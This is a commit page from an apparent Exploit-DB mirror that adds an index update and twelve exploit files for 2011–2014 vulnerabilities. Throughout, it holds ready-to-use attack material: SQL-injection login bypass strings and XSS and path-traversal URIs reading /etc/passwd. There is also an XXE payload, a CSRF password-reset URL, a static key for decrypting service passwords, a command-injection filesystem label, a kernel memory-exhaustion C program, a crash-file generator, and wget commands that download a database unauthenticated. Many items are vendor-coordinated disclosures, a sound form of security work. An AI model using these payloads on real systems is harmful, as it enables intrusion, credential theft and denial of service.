bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

Updated 12_25_2014

Browse source
This commit is contained in:
Offensive Security 2014-12-25 04:53:38 +00:00
parent c0a405fe68
commit 4c02ce5463
15 changed files with 658 additions and 0 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

14
files.csv
View file

@ -32046,3 +32046,17 @@ id,file,description,date,author,platform,type,port
35580,platforms/linux/dos/35580.rb,"Ettercap 0.8.0-0.8.1 - Multiple Denial of Service Vulnerabilities",2014-12-19,"Nick Sampanis",linux,dos,0
35581,platforms/linux/remote/35581.rb,"Varnish Cache CLI Interface Remote Code Execution",2014-12-19,"Patrick Webster",linux,remote,6082
35588,platforms/php/remote/35588.rb,"Lotus Mail Encryption Server (Protector for Mail) LFI to RCE",2014-12-22,"Patrick Webster",php,remote,9000
35590,platforms/windows/local/35590.txt,"BitRaider Streaming Client 1.3.3.4098 Local Privilege Escalation Vulnerability",2014-12-23,LiquidWorm,windows,local,0
35592,platforms/windows/dos/35592.py,"jetAudio 8.1.3 Basic (mp3) - Crash POC",2014-12-23,"Drozdova Liudmila",windows,dos,0
35593,platforms/windows/webapps/35593.txt,"SysAid Server Arbitrary File Disclosure",2014-12-23,"Bernhard Mueller",windows,webapps,0
35594,platforms/jsp/webapps/35594.txt,"NetIQ Access Manager 4.0 SP1 - Multiple Vulnerabilities",2014-12-23,"SEC Consult",jsp,webapps,8443
35595,platforms/linux/local/35595.txt,"GParted 0.14.1 - OS Command Execution",2014-12-23,"SEC Consult",linux,local,0
35596,platforms/php/webapps/35596.txt,"eGroupware 1.8.1 'test.php' Cross Site Scripting Vulnerability",2011-04-07,"AutoSec Tools",php,webapps,0
35597,platforms/hardware/remote/35597.txt,"Fiberhome HG-110 Cross Site Scripting and Directory Traversal Vulnerabilities",2011-04-08,Zerial,hardware,remote,0
35598,platforms/php/webapps/35598.txt,"1024cms 1.1.0 beta Multiple Input Validation Vulnerabilities",2011-04-08,"QSecure and Demetris Papapetrou",php,webapps,0
35599,platforms/asp/webapps/35599.txt,"Dimac CMS 1.3 XS 'default.asp' SQL Injection Vulnerability",2011-04-11,KedAns-Dz,asp,webapps,0
35600,platforms/linux/dos/35600.c,"Linux Kernel 2.6.x 'inotify_init1()' Double Free Local Denial of Service Vulnerability",2011-04-11,anonymous,linux,dos,0
35601,platforms/php/webapps/35601.txt,"Etki Video PRO 2.0 izle.asp id Parameter SQL Injection",2011-04-11,Kurd-Team,php,webapps,0
35602,platforms/php/webapps/35602.txt,"Etki Video PRO 2.0 kategori.asp cat Parameter SQL Injection",2011-04-11,Kurd-Team,php,webapps,0
35603,platforms/php/webapps/35603.txt,"Live Wire 2.3.1 For Wordpress Multiple Security Vulnerabilities",2011-04-11,MustLive,php,webapps,0
35604,platforms/php/webapps/35604.txt,"eForum 1.1 '/eforum.php' Arbitrary File Upload Vulnerability",2011-04-09,QSecure,php,webapps,0

Can't render this file because it is too large.

14
platforms/asp/webapps/35599.txt Executable file
View file

@ -0,0 +1,14 @@
source: http://www.securityfocus.com/bid/47291/info
Dimac CMS XS is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query.
A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.
Dimac CMS XS 1.3 is vulnerable; other versions may also be affected.
The following example URI and data are available:
http://www.example.com/[path]/CMSadmin/default.asp
Username : admin
Password : 1'or'1'='1

17
platforms/hardware/remote/35597.txt Executable file
View file

@ -0,0 +1,17 @@
source: http://www.securityfocus.com/bid/47277/info
Fiberhome HG-110 is prone to a cross-site scripting vulnerability and a directory-traversal vulnerability because it fails to sufficiently sanitize user-supplied input.
Exploiting these issues will allow an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site and to view arbitrary local files and directories within the context of the webserver. This may let the attacker steal cookie-based authentication credentials and other harvested information, which may aid in launching further attacks.
Fiberhome HG-110 firmware 1.0.0 is vulnerable other versions may also be affected.
The following example URIs are available:
http://www.example.com/cgi-bin/webproc?getpage=%3Cscript%3Ealert%28this%29%3C/script%3E&var:menu=advanced&var:page=dns
Local File Include and Directory/Path Traversal:
-
http://www.example.com/cgi-bin/webproc?getpage=../../../../../../../../../../../../etc/passwd&var:menu=advanced&var:page=dns

213
platforms/jsp/webapps/35594.txt Executable file
View file

@ -0,0 +1,213 @@
SEC Consult Vulnerability Lab Security Advisory < 20141218-2 >
=======================================================================
title: Multiple high risk vulnerabilities
product: NetIQ Access Manager
vulnerable version: 4.0 SP1
fixed version: 4.0 SP1 Hot Fix 3
CVE number: CVE-2014-5214, CVE-2014-5215, CVE-2014-5216,
CVE-2014-5217
impact: High
homepage: https://www.netiq.com/
found: 2014-10-29
by: W. Ettlinger
SEC Consult Vulnerability Lab
https://www.sec-consult.com
=======================================================================
Vendor/product description:
---------------------------
"As demands for secure web access expand and delivery becomes increasingly
complex, organizations face some formidable challenges. Access Manager
provides a simple yet secure and scalable solution that can handle all your
web access needs—both internal as well as in the cloud."
URL: https://www.netiq.com/products/access-manager/
Business recommendation:
------------------------
An attacker without an account on the NetIQ Access Manager is be able to gain
administrative access by combining different attack vectors. Though this host
may not always be accessible from a public network, an attacker is still able
to compromise the system when directly targeting administrative users.
Because the NetIQ Access Manager is used for authentication, an attacker
compromising the system can use it to gain access to other systems.
SEC Consult highly recommends that this software is not used until a full
security review has been performed and all issues have been resolved.
Vulnerability overview/description:
-----------------------------------
1) XML eXternal Entity Injection (XXE, CVE-2014-5214)
Authenticated administrative users can download arbitrary files from the Access
Manager administration interface as the user "novlwww".
The vendor provided the following KB link:
https://www.novell.com/support/kb/doc.php?id=7015993
2) Reflected Cross Site Scripting (XSS, CVE-2014-5216)
Multiple reflected cross site scripting vulnerabilities were found. These
allow effective attacks of administrative and SSLVPN sessions.
The vendor provided the following KB link:
https://www.novell.com/support/kb/doc.php?id=7015994
3) Persistent Site Scripting (XSS, CVE-2014-5216)
A persistent cross site scripting vulnerability was found. This allows
effective attacks of administrative and SSLVPN sessions.
The vendor provided the following KB link:
https://www.novell.com/support/kb/doc.php?id=7015996
4) Cross Site Request Forgery (CVE-2014-5217)
The Access Manager administration interface does not have CSRF protection.
The vendor provided the following KB link:
https://www.novell.com/support/kb/doc.php?id=7015997
5) Information Disclosure (CVE-2014-5215)
Authenticated users of the administration interface can gain authentication
information of internal administrative users.
The vendor provided the following KB link:
https://www.novell.com/support/kb/doc.php?id=7015995
By combining all of the above vulnerabilities (CSRF, XSS, XXE) an
unauthenticated, non-admin user may gain full access to the system!
Proof of concept:
-----------------
1) XML eXternal Entity Injection (XXE)
As an example, the following URL demonstrates the retrieval of the /etc/passwd
file as an authenticated administrative user:
https://<host>:8443/nps/servlet/webacc?taskId=fw.PreviewObjectFilter&nextState=initialState&merge=fw.TCPreviewFilter&query=<!DOCTYPE+request+[%0a<!ENTITY+include+SYSTEM+"/etc/passwd">%0a]><query><container>%26include%3b</container><subclasses>false</subclasses></query>
2) Reflected Cross Site Scripting (XSS)
The following URLs demonstrate different reflected XSS flaws in the
administration interface and the user interface.
https://<host>:8443/nps/servlet/webacc?taskId=dev.Empty&merge=dm.GenericTask&location=/roma/jsp/admin/view/main.jss'%2balert+('xss')%2b'
https://<host>:8443/roma/jsp/debug/debug.jsp?xss=%3Cscript%3Ealert%28%27xss%27%29%3C/script%3E
https://<host>:8443//nps/servlet/webacc?taskId=debug.DumpAll&xss=%3Cimg%20src=%22/404%22%20onerror=%22alert+%28%27xss%27%29%22%3E
https://<host>/nidp/jsp/x509err.jsp?error=%3Cscript%3Ealert%28%27xss%27%29%3C/script%3E
https://<host>/sslvpn/applet_agent.jsp?lang=%22%3E%3Cscript%3Ealert%28%27xss%27%29%3C/script%3E
3) Persistent Site Scripting (XSS)
The following URL injects a stored script on the auditing page:
https://<host>:8443/roma/system/cntl?handler=dispatcher&command=auditsave&&secureLoggingServersA='){}};alert('xss');function+x(){if('&port=1289
4) Cross Site Request Forgery
As an example, an attacker is able to change the administration password to
'12345' by issuing a GET request in the context of an authenticated
administrator. The old password is not necessary for this attack!
https://<host>:8443/nps/servlet/webacc?taskId=fw.SetPassword&nextState=doSetPassword&merge=dev.GenConf&selectedObject=P%3Aadmin.novellP&single=admin.novell&SetPswdNewPassword=12345&SetPswdVerifyPassword=12345
5) Information Disclosure
The following URLs disclose several useful information to an authenticated
account:
https://<host>:8443/roma/jsp/volsc/monitoring/dev_services.jsp
https://<host>:8443/roma/jsp/debug/debug.jsp
The disclosed system properties:
com.volera.vcdn.monitor.password
com.volera.vcdn.alert.password
com.volera.vcdn.sync.password
com.volera.vcdn.scheduler.password
com.volera.vcdn.publisher.password
com.volera.vcdn.application.sc.scheduler.password
com.volera.vcdn.health.password
The static string "k~jd)*L2;93=Gjs" is XORed with these values in order
to decrypt passwords of internally used service accounts.
By combining all of the above vulnerabilities (CSRF, XSS, XXE) an
unauthenticated, non-admin user may gain full access to the system!
Vulnerable / tested versions:
-----------------------------
The vulnerabilities have been verified to exist in the NetIQ Access Manager
version 4.0 SP1, which was the most recent version at the time of discovery.
Vendor contact timeline:
------------------------
2014-10-29: Contacting security@netiq.com, sending responsible disclosure
policy and PGP keys
2014-10-29: Vendor redirects to security@novell.com, providing PGP keys
through Novell support page
2014-10-30: Sending encrypted security advisory to Novell
2014-10-30: Novell acknowledges the receipt of the advisory
2014-12-16: Novell: the vulnerability fixes will be released tomorrow;
The CSRF vulnerability will not be fixed immediately
("Since this can be done only after an authorized login");
two XSS vulnerabilities can not be exploited ("We could not
take advantage or retrieve any cookie info on the server
side - it looks like it's a client side cross scripting
attack.")
2014-12-16: Explaining why those vulnerabilities can be exploited
2014-12-17: Novell: Fix will be released tomorrow
2014-12-17: Verifying release of advisory tomorrow
2014-12-18: Novell: Advisory can be released
2014-12-18: Coordinated release of security advisory
Solution:
---------
Update to the latest available of Access Manager and implement workarounds
mentioned in the KB articles by Novell linked above.
Workaround:
-----------
For some vulnerabilities, Novell provides best practice recommendations in the
URLs linked above.
Advisory URL:
-------------
https://www.sec-consult.com/en/Vulnerability-Lab/Advisories.htm
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
SEC Consult Vulnerability Lab
SEC Consult
Vienna - Bangkok - Frankfurt/Main - Montreal - Singapore - Vilnius - Zurich
Headquarter:
Mooslackengasse 17, 1190 Vienna, Austria
Phone: +43 1 8903043 0
Fax: +43 1 8903043 15
Mail: research at sec-consult dot com
Web: https://www.sec-consult.com
Blog: http://blog.sec-consult.com
Twitter: https://twitter.com/sec_consult
Interested to work with the experts of SEC Consult?
Write to career@sec-consult.com
EOF W. Ettlinger / @2014

22
platforms/linux/dos/35600.c Executable file
View file

@ -0,0 +1,22 @@
source: http://www.securityfocus.com/bid/47296/info
The Linux kernel is prone to a local denial-of-service vulnerability.
Attackers can exploit this issue to cause an out-of-memory condition, denying service to legitimate users.
#include <sys/inotify.h>
#include <unistd.h>
int main(int argc, char *argv[])
{
int fds[2];
/* Circumvent max inotify instances limit */
while (pipe(fds) != -1)
;
while (1)
inotify_init();
return 0;
}

123
platforms/linux/local/35595.txt Executable file
View file

@ -0,0 +1,123 @@
SEC Consult Vulnerability Lab Security Advisory < 20141218-1 >
=======================================================================
title: OS Command Execution
product: GParted - Gnome Partition Editor
vulnerable version: <=0.14.1
fixed version: >=0.15.0,
<=0.14.1 with fix for CVE-2014-7208 applied
CVE number: CVE-2014-7208
impact: medium
homepage: http://gparted.org/
found: 2014-07
by: W. Ettlinger
SEC Consult Vulnerability Lab
https://www.sec-consult.com
=======================================================================
Vendor description:
-------------------
"GParted is a free partition editor for graphically managing your disk
partitions.
With GParted you can resize, copy, and move partitions without data
loss, enabling you to:
* Grow or shrink your C: drive
* Create space for new operating systems
* Attempt data rescue from lost partitions"
URL: http://gparted.org/index.php
Vulnerability overview/description:
-----------------------------------
Gparted <=0.14.1 does not properly sanitize strings before passing
them as parameters to an OS command. Those commands are executed
using root privileges.
Parameters that are being used for OS commands in Gparted are normally
determined by the user (e.g. disk labels, mount points). However, under
certain circumstances, an attacker can use an external storage device to
inject command parameters. These circumstances are met if for example an
automounter uses a filesystem label as part of the mount path.
Please note that GParted versions before 0.15 are still being used
in distributions. E.g Debian Wheezy is vulnerable to this issue before
applying the patches.
Proof of concept:
-----------------
The following command creates a malicious filesystem.
# mkfs.ext2 -L "\`reboot\`" /dev/sdXX
When this filesystem is mounted by an automounter to a mountpoint
containing the filesystem label and the user tries to unmount this filesystem
using GParted, the system reboots.
Vulnerable / tested versions:
-----------------------------
Gparted versions <=0.14.1 were found to be vulnerable.
Vendor contact timeline:
------------------------
2014-10-29: Contacting maintainer (Curtis Gedak) through
gedakc AT users DOT sf DOT net
2014-10-29: Initial response from maintainer offering encryption
2014-10-30: Sending encrypted advisory
2014-10-30: Maintainer confirms the behaviour, will be investigated
further
2014-11-04: Maintainer sends initial patches
2014-11-05: Giving a few notes on the patches
2014-11-05: Maintainer clarifies a few concerns with the patches;
Forwards patches to Mike Fleetwood for review
2014-11-08: Review shows that the patches cause functional
problems; proposes further procedure
2014-11-08: Maintainer proposes a different patching approach
2014-11-08: Reviewer shows concerns with this approach, opens
a security bug (1171909) with Fedora (in accordance with
their Security Tracking Bugs procedure);
Red Hat creates tracking bug 1172549
2014-11-15: New patches for several versions
2014-11-23: Maintainer sends vulnerability information to Debian
2014-11-29: Debian Security Team responds, asks for embargo date and
CVE number
2014-11-30: Release date set to 2014-12-18
2014-12-11: Mailing list linux-distros AT vs DOT openwall DOT org informed
2014-12-11: Writing that embargo may be lifted, SEC Consult will release
advisory on 2014-12-18
2014-12-18: Coordinated release of security advisory
Solution:
---------
Update GParted to version >= 0.15.0 or apply security patches for
CVE-2014-7208.
Advisory URL:
-------------
https://www.sec-consult.com/en/Vulnerability-Lab/Advisories.htm
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
SEC Consult Vulnerability Lab
SEC Consult
Vienna - Bangkok - Frankfurt/Main - Montreal - Singapore - Vilnius - Zurich
Headquarter:
Mooslackengasse 17, 1190 Vienna, Austria
Phone: +43 1 8903043 0
Fax: +43 1 8903043 15
Mail: research at sec-consult dot com
Web: https://www.sec-consult.com
Blog: http://blog.sec-consult.com
Twitter: https://twitter.com/sec_consult
Interested to work with the experts of SEC Consult?
Write to career@sec-consult.com
EOF W. Ettlinger / @2014

9
platforms/php/webapps/35596.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/47273/info
eGroupware is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
eGroupware 1.8.001 is vulnerable; other versions may also be affected.
http://www.example.com/egroupware/phpgwapi/js/jscalendar/test.php?lang=%22%3E%3C/script%3E%3Cscript%3Ealert%280%29%3C/script%3E

19
platforms/php/webapps/35598.txt Executable file
View file

@ -0,0 +1,19 @@
source: http://www.securityfocus.com/bid/47282/info
1024cms is prone to multiple cross-site scripting vulnerabilities, multiple local file-include vulnerabilities, and a directory-traversal vulnerability
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site, steal cookie-based authentication credentials, and open or run arbitrary files in the context of the webserver process ad gain access to sensitive information.
1024cms 1.1.0 beta is vulnerable; other versions may also be affected.
http://www.example.com/index.php?mode=login&processfile=../../../../../../etc/passwd%00
http://www.example.com/index.php?msg=PHNjcmlwdD5hbGVydCgnWFNTJyk7PC9zY3JpcHQ%2b
http://www.example.com/modules/forcedownload/force_download.php?filename=../../../../../../../etc/passwd
http://www.example.com/index.php?act=../../../../../../etc/passwd%00
http://www.example.com/dashboard.php?act=../../../../../../../etc/passwd%00
http://www.example.com/index.php?msg=PHNjcmlwdD5hbGVydCgnWFNTJyk7PC9zY3JpcHQ%2b
http://www.example.com/dashboard.php?msg_error=PHNjcmlwdD5hbGVydCgnWFNTJyk7PC9zY3JpcHQ%2b
http://www.example.com/dashboard.php?msg_okay=PHNjcmlwdD5hbGVydCgnWFNTJyk7PC9zY3JpcHQ%2b
http://www.example.com/dashboard.php?msg_info=PHNjcmlwdD5hbGVydCgnWFNTJyk7PC9zY3JpcHQ%2b
http://www.example.com/dashboard.php?msg_attention=PHNjcmlwdD5hbGVydCgnWFNTJyk7PC9zY3JpcHQ%2b

9
platforms/php/webapps/35601.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/47298/info
Etki Video Pro is prone to multiple SQL-injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in an SQL query.
A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.
Etki Video Pro 2.0 is vulnerable; other versions may also be affected.
http://www.example.com/[path]/izle.asp?id=254 [SQL Injection]

9
platforms/php/webapps/35602.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/47298/info
Etki Video Pro is prone to multiple SQL-injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in an SQL query.
A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.
Etki Video Pro 2.0 is vulnerable; other versions may also be affected.
http://www.example.com/[path]/kategori.asp?cat=1 [SQL Injection]

13
platforms/php/webapps/35603.txt Executable file
View file

@ -0,0 +1,13 @@
source: http://www.securityfocus.com/bid/47299/info
Live Wire for Wordpress is prone to multiple security vulnerabilities. These vulnerabilities include multiple denial-of-service vulnerabilities, a cross-site scripting vulnerability, and an information-disclosure vulnerability.
Exploiting these issues could allow an attacker to deny service to legitimate users, gain access to sensitive information, execute arbitrary script code, or steal cookie-based authentication credentials. Other attacks may also be possible.
Live Wire for Wordpress 2.3.1 is vulnerable; other versions may also be affected.
http://www.example.com/wp-content/themes/livewire-edition/thumb.php?src=%3Cbody%20onload=alert(document.cookie)%3E.jpg
http://www.example.com/wp-content/themes/livewire-edition/thumb.php?src=jpg
http://www.example.com/wp-content/themes/livewire-edition/thumb.php?src=http://site/big_file&h=1&w=1

18
platforms/php/webapps/35604.txt Executable file
View file

@ -0,0 +1,18 @@
source: http://www.securityfocus.com/bid/47309/info
eForum is prone to an arbitrary-file-upload vulnerability because the application fails to adequately sanitize user-supplied input.
An attacker can exploit this issue to upload arbitrary code and run it in the context of the webserver process.
eForum 1.1 is vulnerable; other versions may also be affected.
if (isset($_FILES)) { //upload attachments
...snip...
$invalidFileTypes = array('php', 'php3', 'php4', 'php5', 'exe', 'dll', 'so', 'htaccess');
$uploaddir = $eforum->path.'/upload';
$upfiles = $_FILES['efattachment'];
foreach ($upfiles['name'] as $idx => $upname) {
if ($upname != '') {
$source = $upfiles['tmp_name'][$idx];
if (is_uploaded_file($source)) {
if (in_array($fmanager->FileExt($upname), $invalidFileTypes)) { continue; }

30
platforms/windows/dos/35592.py Executable file
View file

@ -0,0 +1,30 @@
# Exploit Title : jetAudio 8.1.3 Basic (Corrupted mp3) Crash POC
# Product : jetAudio Basic
# Date : 8.12.2014
# Exploit Author : ITDefensor Vulnerability Research Team http://itdefensor.ru/
# Software Link : http://www.jetaudio.com/download/
# Vulnerable version : 8.1.3 (Latest at the moment) and probably previous versions
# Vendor Homepage : http://www.jetaudio.com/
# Tested on : jetAudio 8.1.3 Basic installed on Windows 7 x64, Windows Server 2008, Windows 7 x86
# CVE : unknown at the moment
#============================================================================================
# Open created POC file (fault.mp3) with jetAudio
# Details
# (1e764.1df98): Access violation - code c0000005 (first chance)
# First chance exceptions are reported before any exception handling.
# This exception may be expected and handled.
# jdl_id3lib!dami::io::BStringWriter::writeChars+0xbf9:
# 0aa6b8b9 8b4804 mov ecx,dword ptr [eax+4] ds:002b:00000004=????????
# 0:000:x86> kb
# ChildEBP RetAddr Args to Child
# WARNING: Stack unwind information not available. Following frames may be wrong.
# 00000000 00000000 00000000 00000000 00000000 jdl_id3lib!dami::io::BStringWriter::writeChars+0xbf9
#============================================================================================
#!/usr/bin/python
pocdata=("\x49\x44\x33\x00\x00\xC9\x00\x00\x00\x00\x41\x45\x4E\x43\x00\x00\x00\x00\x00\x00\x41\x45\x4E\x43\x00\x00\x00\x00\x00\x00\x41\x45\x4E\x43\x00\x00\x00\x00\x00\x00\x41\x45\x4E\x43\x00\x00\x00\x00\x00\x00\x41\x45\x4E\x43\x00\x00\x00\x00\x00\x00\xFF\x8E\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x54\x41\x47\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00")
mp3file = "fault.mp3"
file = open(mp3file , "w")
file.write(pocdata)
file.close()

81
platforms/windows/local/35590.txt Executable file
View file

@ -0,0 +1,81 @@
?
BitRaider Streaming Client 1.3.3.4098 Local Privilege Escalation Vulnerability
Vendor: BitRaider, LLC
Product web page: http://www.bitraider.com
Affected version: 1.3.3.4098
Summary: BitRaider is a video game streaming and download service.
Desc: BitRaider contains a flaw that leads to unauthorized privileges being gained.
The issue is due to the program granting improper permissions with the 'F' flag for
the 'Users' group, which makes the entire 'BitRaider' directory and its sub directories
and files world-writable. This may allow a local attacker to change an executable file
with a binary file and gain elevated privileges.
List of executables affected:
o====================================================================================================o
| Binary/location | Description |
| | |
|=============================================================== ====================================|
| C:\ProgramData\BitRaider\BRSptStub.exe | BitRaider Support Stub |
|---------------------------------------------------------------|------------------------------------|
| C:\ProgramData\BitRaider\common\BRException.exe | BitRaider Exception Handler |
|---------------------------------------------------------------|------------------------------------|
| C:\ProgramData\BitRaider\common\brwc.exe | BitRaider Distribution Web Client |
|---------------------------------------------------------------|------------------------------------|
| C:\ProgramData\BitRaider\support\1.3.3\E02B25FC\BRSptSvc.exe | BitRaider Support Service Core |
o====================================================================================================o
Tested on: Microsoft Windows 7 Professional SP1 (EN)
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2014-5217
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2014-5217.php
17.12.2014
----
C:\Users\user>sc qc BRSptStub
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: BRSptStub
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 3 DEMAND_START
ERROR_CONTROL : 0 IGNORE
BINARY_PATH_NAME : "C:\ProgramData\BitRaider\BRSptStub.exe"
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : BitRaider Mini-Support Service Stub Loader
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
C:\Users\user>icacls "C:\ProgramData\BitRaider\BRSptStub.exe"
C:\ProgramData\BitRaider\BRSptStub.exe BUILTIN\Users:(F) <--------------------------
NT AUTHORITY\SYSTEM:(F)
NT AUTHORITY\Authenticated Users:(F) <-------
BUILTIN\Administrators:(F)
NT AUTHORITY\INTERACTIVE:(F) <---------------
NT AUTHORITY\SERVICE:(F)
BUILTIN\Guests:(RX)
BUILTIN\Users:(I)(F) <-----------------------
NT AUTHORITY\SYSTEM:(I)(F)
NT AUTHORITY\Authenticated Users:(I)(F) <----
BUILTIN\Administrators:(I)(F)
NT AUTHORITY\INTERACTIVE:(I)(F) <------------
NT AUTHORITY\SERVICE:(I)(F)
BUILTIN\Guests:(I)(RX)
Successfully processed 1 files; Failed processing 0 files
C:\Users\user>

67
platforms/windows/webapps/35593.txt Executable file
View file

@ -0,0 +1,67 @@
Vantage Point Security Advisory 2014-004
========================================
Title: SysAid Server Arbitrary File Disclosure
ID: VP-2014-004
Vendor: SysAid
Affected Product: SysAid On-Premise
Affected Versions: < 14.4.2
Product Website: http://www.sysaid.com/product/sysaid
Author: Bernhard Mueller <bernhard[at]vantagepoint[dot]sg>
Summary:
---
SysAid Server is vulnerable to an unauthenticated file disclosure
attack that allows an anonymous attacker to read arbitrary files on
the system. An attacker exploiting this issue can compromise SysAid
user accounts and gain access to important system files. When SysAid
is configured to use LDAP authentication it is possible to gain read
access to the entire Active Directory or obtain domain admin
privileges.
Details:
---
How to download SysAid server database files containing usernames and
password hashes (use any unauthenticated session ID):
wget -O "ilient.mdf" --header="Cookie:
JSESSIONID=1C712103AA8E9A3D3F1D834E0063A089" \
"http://sysaid.example.com/getRdsLogFile?fileName=c:\\\\Program+Files\\\\SysAidMsSQL\\\\MSSQL10_50.SYSAIDMSSQL\\\\MSSQL\\DATA\\\\ilient.mdf"
wget -O "ilient.ldf" --header="Cookie:
JSESSIONID=1C712103AA8E9A3D3F1D834E0063A089" \
"http://sysaid.example.com/getRdsLogFile?fileName=c:\\\\Program+Files\\\\SysAidMsSQL\\\\MSSQL10_50.SYSAIDMSSQL\\\\MSSQL\\DATA\\\\ilient_log.LDF"
The dowloaded MSSQL files contain the LDAP user account and encrypted
password used to access the Active Directory (SysAid encrypts the
password with a static key that is the same for all instances of the
software).
Fix Information:
---
Upgrade to version 14.4.2.
Timeline:
---
2014/11/14: Issue reported
2014/12/22: Patch available and installed by client
About Vantage Point Security:
---
Vantage Point Security is the leading provider for penetration testing
and security advisory services in Singapore. Clients in the Financial,
Banking and Telecommunications industries select Vantage Point
Security based on technical competency and a proven track record to
deliver significant and measurable improvements in their security
posture.
Web: https://www.vantagepoint.sg/
Contact: office[at]vantagepoint[dot]sg